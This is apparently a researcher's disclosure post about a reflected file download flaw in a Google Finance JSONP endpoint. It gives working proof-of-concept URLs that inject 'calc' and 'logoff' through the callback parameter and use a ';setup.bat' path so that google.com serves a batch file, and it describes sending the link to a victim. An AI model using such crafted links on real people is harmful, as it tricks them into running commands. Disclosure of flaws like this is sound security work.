Found this vulnerability when auditing other client. With this RFD you don’t need to create a page to force the download.
The request for this Google JSON file already do this for us.
When I noticed this request:
http://www.google.com/finance/info?q=ELI:ALTR&callback=?
Which returned the following information:
// [ { "id": "703655" ,"t" : "ALTR" ,"e" : "ELI" ,"l" : "4.71" ,"l_fix" : "4.71" ,"l_cur" : "€4.71" ,"s": "0" ,"ltt":"5:35PM GMT+1" ,"lt" : "Dec 15, 5:35PM GMT+1" ,"lt_dts" : "2015-12-15T17:35:40Z" ,"c" : "+0.31" ,"c_fix" : "0.31" ,"cp" : "7.14" ,"cp_fix" : "7.14" ,"ccol" : "chg" ,"pcls_fix" : "4.396" } ]
I wondered if that callback parameter could be manipulated. So I injected “calc” on the request:
http://www.google.com/finance/info?q=ELI:ALTR&callback=calc
Which returned the following information:
// calc([ { "id": "703655" ,"t" : "ALTR" ,"e" : "ELI" ,"l" : "4.71" ,"l_fix" : "4.71" ,"l_cur" : "€4.71" ,"s": "0" ,"ltt":"5:35PM GMT+1" ,"lt" : "Dec 15, 5:35PM GMT+1" ,"lt_dts" : "2015-12-15T17:35:40Z" ,"c" : "+0.31" ,"c_fix" : "0.31" ,"cp" : "7.14" ,"cp_fix" : "7.14" ,"ccol" : "chg" ,"pcls_fix" : "4.396" } ] );
Done! Got my injected Windows command on this XHR request. Time to check if the URL is permissive:
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
Guess what? I got a URL that automatically shows the download dialog from Google with a batch file.
I tried successfully with the following browsers:
- Firefox latest version
- Opera latest version
- Internet Explorer 8 and 9
What are the limitations?
I noticed in my testing that most of the chars are being sanitized so it only allows you to use one command without spaces or arguments.
Proof-of-concept:
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=calc
[when the batch is executed the Windows calculator opens]
http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff
[when the batch is executed the system logoffs the authenticated user]
Possible attack scenario:
- Attacker sends the URL – http://www.google.com/finance/info;setup.bat?q=ELI:ALTR&callback=logoff – to the victim.
- Victim downloads the file and execute it.
- After execution of the batch file it will logoff the victim from the operating system.
I made a small video that illustrates my proof-of-concept:
Google decided that this issue has very little or no security impact. Personally I don’t agree but that’s my opinion 🙂
So this RFD is still unpatched. I hope they change their mind and fix this soon.